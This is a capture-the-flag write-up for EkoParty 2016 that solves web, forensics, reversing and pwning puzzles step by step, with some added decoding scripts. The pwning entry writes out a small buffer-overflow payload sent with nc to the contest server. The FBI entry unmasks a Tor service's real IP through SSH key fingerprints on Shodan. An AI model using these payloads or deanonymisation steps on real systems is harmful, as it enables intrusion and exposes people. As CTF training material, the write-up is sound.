What follows is a write-up of the 2016 EkoParty Capture the Flag competition.
Competitors were given a set of challenges which they had to complete to get a flag.
The categories included:
- FBI
- Forensics
- Misc
- Pwning
- Reversing
- Web
[*] Note: Written in the order completed.
Challenge: Web – Mr. Robot (25)
Disallow it!
Solution:
Browse to: https://ctf.ekoparty.org/robots.txt
Browse to: https://ctf.ekoparty.org/static/wIMti7Z27b.txt
Flag: EKO{robot_is_following_us}
Challenge: Web – RFC 7230 (50)
Get just basic information from this server (ctf.ekoparty.org).
Solution:
Open up Burp Proxy with Intercept On
Browse to: https://ctf.ekoparty.org/
Right-click -> Do Intercept -> Response to this request
Flag: EKO{this_is_my_great_server}
Challenge: Forensics – Hidden inside EKO (50)
Find the hidden flag in the EKO pixels!
Solution:
stegsolve background.png
Alpha plane 7
Flag: EKO{th3_fl4g}
Challenge: FBI – Find me (100)
Now, use your hacker-fu to get the real IP from this service, please use EKO{IP} as the answer.
ssh ekosshlons2uweke.onion
Solution:
torify ssh-keyscan ekosshlons2uweke.onion 2>/dev/null
# Enumerating the public keys
Copy/Paste the output of the above in a file ‘find_me.txt’
ssh-keygen -l -f find_me.txt
# Listing the fingerprints of the RSA and ECDSA keys
Browse to: https://www.shodan.io/
Search for: 4f:b2:e5:dd:63:86:dd:52:d1:d5:a4:d3:3c:55:e5:2e
Flag: EKO{52.73.16.127}
Challenge: Pwning – Ultra baby (25)
Reach the flag function!
nc 9a958a70ea8697789e52027dc12d7fe98cad7833.ctf.site 55000
Attachment
pwn25_5ae6e58885e7cd75.zip
Solution:
./r2_ui ultrababy
Actions -> Analyze
# Notice the flag function at 0x000007f3
r2 ultrababy
doo
dc
python -c "print 'A' * 30"
Input: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# Note how it says "Invalid command 'AAAAA' (0x41)"
doo
python -c "print 'A' * 23 + '\x7f3'" | ./ultrababy
# We get a segmentation fault
python -c "print 'A' * 24 + '\xf3'" | ./ultrababy
# We got our solution
python -c "print 'A' * 24 + '\xf3'" | nc 9a958a70ea8697789e52027dc12d7fe98cad7833.ctf.site 55000
Flag: EKO{Welcome_to_pwning_challs_2k16}
Challenge: Reversing – JVM (25)
Bytecodes everywhere, reverse them.
Attachment
rev25_3100aa76fca4432f.zip
Solution:
# Notice the title ‘JVM’ as well as the filename ‘EKO.class’
jad EKO.class
cat EKO.jad
# See EKO.py
python EKO.py
Flag: EKO{893116}
Challenge: Reversing – F#ck (50)
The miracle of the expressive functional programming, is it really functional?
Attachment
rev50_3511a8cd66b371eb.zip
Solution:
file FlagGenerator.exe
# This is a .NET binary
Open Visual Studio -> Tools -> ILSpy -> Open the file
Decompile the program
Flag: EKO{f#ck_this_sh#t}
Challenge: Reversing – RrEeGgEeXx (75)
State-of-the-art on authentication mechanisms.
Attachment
rev75_79816641bfd11577.zip
Solution:
Open Visual Studio -> Tools -> ILSpy -> Open the file
Decompile the program
'''
Note the:
if (Program.check_regex("^.{40}$", input)
&& Program.check_regex("\\w{3}\\{.*\\}", input)
&& Program.check_regex("_s.*e_", input)
&& Program.check_regex("\\{o{2}O{2}o{2}", input)
&& Program.check_regex("O{2}o{2}O{2}\\}", input)
&& Program.check_regex("sup3r_r3g3x_challenge", input))
The flag contains:
1) exactly 40 characters
2) 3 random letters, then { <random characters> }
This translates to EKO{<random>}
3) _s, then random characters, then e_
4) {ooOOoo
5) OOooOO}
6) sup3r_r3g3x_challenge
This translates to: EKO{ooOOoo_sup3r_r3g3x_challenge_OOooOO}
'''
Flag: EKO{ooOOoo_sup3r_r3g3x_challenge_OOooOO}
Challenge: Reversing – Old Times (100)
Grace Hopper will be proud of you! Don’t let her down!
Attachment
rev100_62f48362bc4a0397.zip
Solution:
Open ViewSavF -> Open the file
Library – Part1 – EKOPARTY(PF) -> CHALLENGE1
Flag: EKO{0ld_t1m3s_n3v3r_c0m3_b4ck}
Challenge: Reversing – Back Again (150)
There are no disassemblers for this kind of program or this is what we think, can you prove otherwise?
Attachment
rev150_9f0cc9207d9c580d.zip
Solution:
dd conv=ascii if=CHALLENGE2.MBR of=CHALLENGE2.txt
# Convert from EBCDIC to ASCII
strings CHALLENGE2.txt
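'''
Note:
LNRENTER SECRET KEYCHECKING SECRET KEYOKAY! GRAB YOUR FLAGCA}wN_tfYO_mU_gpPL_yEAtrSEap_GokIVe_E_t3ME3l_T_lHE0b_F0cLA{OG?KEOH SNAP, YOUR KEY IS WRONG!CHALLENGE2
The text between "GRAB YOUR FLAG" and "OH SNAP" holds two strings interleaved in two-character chunks.
The even chunks spell CAN_YOU_PLEASE_GIVE_ME_THE_FLAG? and the odd chunks, joined and reversed, spell the flag.
This translates to: EKO{c0b0l_l33t_ekoparty_pgm_ftw}
'''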
Flag: EKO{c0b0l_l33t_ekoparty_pgm_ftw}
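The decoding step above as a short script. This is an added example, not one of the scripts from the original write-up; the function names and the two marker strings used to cut out the blob are choices made for the example.

```python
# Added example: split the interleaved blob from the `strings` output
# into its two hidden strings.

# The line printed by `strings CHALLENGE2.txt`, copied from the note above.
STRINGS_OUTPUT = (
    "LNRENTER SECRET KEYCHECKING SECRET KEYOKAY! GRAB YOUR FLAG"
    "CA}wN_tfYO_mU_gpPL_yEAtrSEap_GokIVe_E_t3ME3l_T_lHE0b_F0cLA{OG?KE"
    "OH SNAP, YOUR KEY IS WRONG!CHALLENGE2"
)


def extract_blob(text, before="GRAB YOUR FLAG", after="OH SNAP"):
    """Return the characters sitting between the two program messages."""
    start = text.index(before) + len(before)
    end = text.index(after, start)
    return text[start:end]


def deinterleave(blob, width=2):
    """Split blob into width-sized chunks and separate the two streams.

    Even-numbered chunks form the decoy sentence. Odd-numbered chunks,
    joined and then reversed character by character, form the flag.
    """
    if len(blob) % (2 * width):
        raise ValueError("blob length is not a whole number of chunk pairs")
    chunks = [blob[i:i + width] for i in range(0, len(blob), width)]
    decoy = "".join(chunks[0::2])
    hidden = "".join(chunks[1::2])[::-1]
    return decoy, hidden


if __name__ == "__main__":
    decoy, hidden = deinterleave(extract_blob(STRINGS_OUTPUT))
    print(decoy)
    print(hidden)
```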
Challenge: Forensics – Damaged (75)
All you have to do is to see this damaged image!
Attachment
for75_165560e4a08b23f7.zip
Solution:
Read about the BMP file structure: https://en.wikipedia.org/wiki/BMP_file_format
hexedit -b damaged_image.bmp
'''
The corrupt image starts with the DIB header; the BMP file header is missing
The BMP header template is: 42 4d AA AA AA AA 00 00 00 00 BB BB BB BB
Where ‘AA’ is the size of the file and ‘BB’ is the offset of the pixel array
We will change it to: 42 4d 46 00 00 00 00 00 00 00 36 00 00 00
'''
Add the above using Ctrl-A
Ctrl-X
Open the file
Flag: EKO{b1tm4p_r3c}
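The same repair done programmatically, computing the two header fields instead of typing them into a hex editor. This is an added example, not part of the original write-up; it assumes the headerless data begins with a BITMAPINFOHEADER-style DIB header of 40 bytes or more, and the 2x2 sample image is constructed for the example.

```python
# Added example: prepend the missing 14-byte BMP file header to data
# that starts directly at the DIB header.
import struct

FILE_HEADER_LEN = 14


def rebuild_bmp(headerless: bytes) -> bytes:
    """Return a complete BMP built from DIB header + pixel data."""
    if len(headerless) < 40:
        raise ValueError("too short to contain a BITMAPINFOHEADER")
    (dib_size,) = struct.unpack_from("<I", headerless, 0)
    if dib_size < 40 or dib_size > len(headerless):
        raise ValueError("unexpected DIB header size: %d" % dib_size)
    (bpp,) = struct.unpack_from("<H", headerless, 14)          # bits per pixel
    (compression,) = struct.unpack_from("<I", headerless, 16)
    (colors_used,) = struct.unpack_from("<I", headerless, 32)
    # Images with 8 bpp or fewer carry a colour table of 4-byte entries.
    palette_entries = colors_used or ((1 << bpp) if bpp <= 8 else 0)
    # A 40-byte header with BI_BITFIELDS (3) is followed by three masks.
    masks = 12 if (dib_size == 40 and compression == 3) else 0
    pixel_offset = FILE_HEADER_LEN + dib_size + masks + 4 * palette_entries
    file_size = FILE_HEADER_LEN + len(headerless)
    # 'BM', file size (AA), two reserved words, pixel array offset (BB).
    header = struct.pack("<2sIHHI", b"BM", file_size, 0, 0, pixel_offset)
    return header + headerless


def sample_headerless_bmp() -> bytes:
    """Constructed input: 2x2, 24-bit image without its file header."""
    dib = struct.pack("<IiiHHIIiiII", 40, 2, 2, 1, 24, 0, 16, 2835, 2835, 0, 0)
    # Two rows of two pixels, each row padded to 8 bytes.
    pixels = bytes.fromhex("0000ff ffffff 0000" "ff0000 00ff00 0000")
    return dib + pixels


if __name__ == "__main__":
    print(rebuild_bmp(sample_headerless_bmp())[:FILE_HEADER_LEN].hex(" "))
```

For the constructed 2x2 sample the computed header is the same 14 bytes as the one entered by hand above.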
Challenge: Forensics – Hacker in Disguise (100)
We have captured these codes in a secret communication, please tell us its meaning.
Hint
Hacker In Disguise Uses Sweet Bubbles
Attachment
for100_329717ebd73d0b20.zip
Solution:
# After searching with different parts of the file, we find out that
# this turns out to be a log file of an HID keyboard
# The title itself gave the hint with the first letter of every word: H-I-D-U-S-B
Google: hid keyboard commands
Read: http://www.freebsddiary.org/APC/usb_hid_usages.php
# We build the HID usage table in Python
vi HID_convert.py
# We build a script for HID to ASCII conversion
vi HID-to-ascii.py
python HID-to-ascii.py
Flag: EKO{HOLAPIANOLA}
Challenge: Forensics – Alice Secret Message (175)
There is something fishy here!
Attachment
for175_8ea180f3d676d67d.zip
Solution:
Unzip the image
testdisk PhysicalDrive5
Proceed -> None -> Advanced -> Undelete -> a -> C -> C -> q -> Quit
Open ‘OFICIO.txt’
# Note the strange spacing
# There are eight spaces/tabs per line
# See secret_message.py
python secret_message.py
Flag: EKO{this_is_my_secret_message}
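One way to read a message out of that kind of spacing, as an added example that is not the author's secret_message.py. It assumes each line's eight spaces/tabs encode one byte, most significant bit first, with a tab as 1 and a space as 0; the cover text and message are constructed for the example.

```python
# Added example: decode one byte per line from its spaces and tabs.

def decode_line_gaps(text, one="\t"):
    """Treat the spaces/tabs of each line as the 8 bits of one byte.

    Lines that do not contain exactly eight spaces/tabs are skipped, so
    ordinary header or blank lines do not corrupt the output.
    """
    out = bytearray()
    for line in text.splitlines():
        gaps = [c for c in line if c in " \t"]
        if len(gaps) != 8:
            continue
        bits = "".join("1" if c == one else "0" for c in gaps)
        out.append(int(bits, 2))
    return out.decode("latin-1")


def build_sample(message):
    """Constructed cover text: nine words per line, eight gaps carry a byte."""
    words = "one two three four five six seven eight nine".split()
    lines = ["HEADER"]  # a line without eight gaps, ignored by the decoder
    for byte in message.encode("latin-1"):
        line = words[0]
        for bit, word in zip(format(byte, "08b"), words[1:]):
            line += ("\t" if bit == "1" else " ") + word
        lines.append(line)
    return "\n".join(lines)


if __name__ == "__main__":
    sample = build_sample("constructed")
    print(decode_line_gaps(sample))
    # If the output is unreadable, the polarity may be inverted:
    # decode_line_gaps(sample, one=" ")
```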